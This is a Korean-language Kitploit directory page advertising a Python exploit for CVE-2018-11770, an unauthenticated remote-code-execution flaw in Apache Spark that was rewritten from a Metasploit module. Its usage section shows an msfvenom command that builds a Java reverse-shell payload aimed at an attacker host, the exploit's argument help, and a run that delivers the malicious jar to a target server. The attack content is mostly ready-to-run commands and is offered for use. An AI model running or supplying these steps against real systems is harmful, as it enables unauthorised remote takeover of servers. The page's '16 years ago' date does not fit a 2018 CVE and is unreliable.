Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2018-11770 — 파이썬 기반 Apache Spark RCE 익스플로잇, Metasploit 모듈에서 재작성됨 | Kitploit
도구/GitHubGitHub/ivanitlearning/cve-2018-11770
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubivanitlearning/cve-2018-11770

CVE-2018-11770

파이썬 기반 Apache Spark RCE 익스플로잇, Metasploit 모듈에서 재작성됨

저장소 보기
16년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2018-11770 Apache Spark 비인증 리버스 셸 RCE

이 Metasploit 모듈에서 재작성된 Apache Spark용 독립형 Python 3 RCE 익스플로잇

익스플로잇 POC는 여기에서 설명합니다. 익스플로잇 코드 자체는 여기에서 설명합니다.

Python 3.7에서 이 대상으로 테스트되었습니다.

사용법:

root@kitploit:~
root@Kali:~/Infosec/RubyStuff/Apache-Spark-RCE# msfvenom -p java/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4444 -f jar -o payload/exploit.jar
Payload size: 7550 bytes
Final size of jar file: 7550 bytes
Saved as: payload/exploit.jar

root@Kali:~/Infosec/RubyStuff/Apache-Spark-RCE# ./CVE-2018-11770.py -h
usage: CVE-2018-11770.py [-h] [-httpdelay HTTPDELAY] -rhost RHOST
                         [-rport RPORT] -srvhost SRVHOST [-srvport SRVPORT]
                         [-uripath URIPATH] -payload PAYLOAD

Call the exploit like this: 
./CVE-2018-11770.py -httpdelay 10 -rhost 192.168.92.153 -rport 6066 -srvhost 192.168.92.134 -srvport 8080 -uripath path -payload exploit.jar

필수 인수:
  -rhost RHOST          Apache Spark가 실행 중인 대상 호스트 (예: 192.168.92.153)
  -srvhost SRVHOST      로컬에서 수신할 호스트. Apache Spark가 접근할 수 있는 로컬 머신의 주소여야 함 (예: 192.168.92.134)
  -payload PAYLOAD      악성 jar 파일의 경로 (예: dir/exploit.jar)

선택적 인수:
  -httpdelay HTTPDELAY  웹 서버가 종료되기 전 기다리는 시간(초). 기본값: 10초
  -rport RPORT          Apache Spark가 실행 중인 대상 포트. 기본값: 6066
  -srvport SRVPORT      로컬에서 수신할 포트. 기본값: 8080
  -uripath URIPATH      이 익스플로잇을 위해 웹 서버가 제공할 URI 경로. 기본값: path (예: http://192.168.92.134/path)

root@Kali:~/Infosec/RubyStuff/Apache-Spark-RCE# ./CVE-2018-11770.py -rhost 192.168.92.153 -srvhost 192.168.92.134 -payload payload/exploit.jar 
Started Web server...
Sending the payload to the server...
도구 다운로드